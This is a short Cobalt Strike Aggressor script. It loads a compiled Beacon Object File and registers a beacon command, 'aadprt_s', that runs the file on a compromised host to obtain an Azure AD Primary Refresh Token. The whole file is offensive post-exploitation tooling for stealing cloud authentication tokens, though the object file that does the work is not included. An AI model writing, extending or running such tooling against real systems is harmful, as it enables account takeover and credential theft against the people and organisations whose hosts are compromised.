

sub readbof {
	local('$barch $handle $data $args');
	$barch  = barch($1);

	# read in the right BOF file
    println(script_resource("bin/ $+ $2 $+ . $+ $barch $+ .o"));
	$handle = openf(script_resource("bin/ $+ $2 $+ . $+ $barch $+ .o"));
	$data   = readb($handle, -1);
	closef($handle);
	if(strlen($data) == 0)
	{
		berror($1, "could not read bof file");
	}

	# pack our arguments
	#$args   = bof_pack($1, "zi", "Hello World", 1234);

	# announce what we're doing
	btask($1, "Running $2");
	return $data;
}

alias aadprt_s{
	if( size(@_) < 2)
	{
		berror($1, "requires file path");
		berror($1, beacon_command_detail("aadprt"));
		return;
	}
	beacon_inline_execute($1, readbof($1, "aadprt_s"), "go",  bof_pack($1, "Z", $2));
}

beacon_command_register(
	"aadprt_s",
	"get azure AD PRT token",
	"aadprt <nonce>"
);
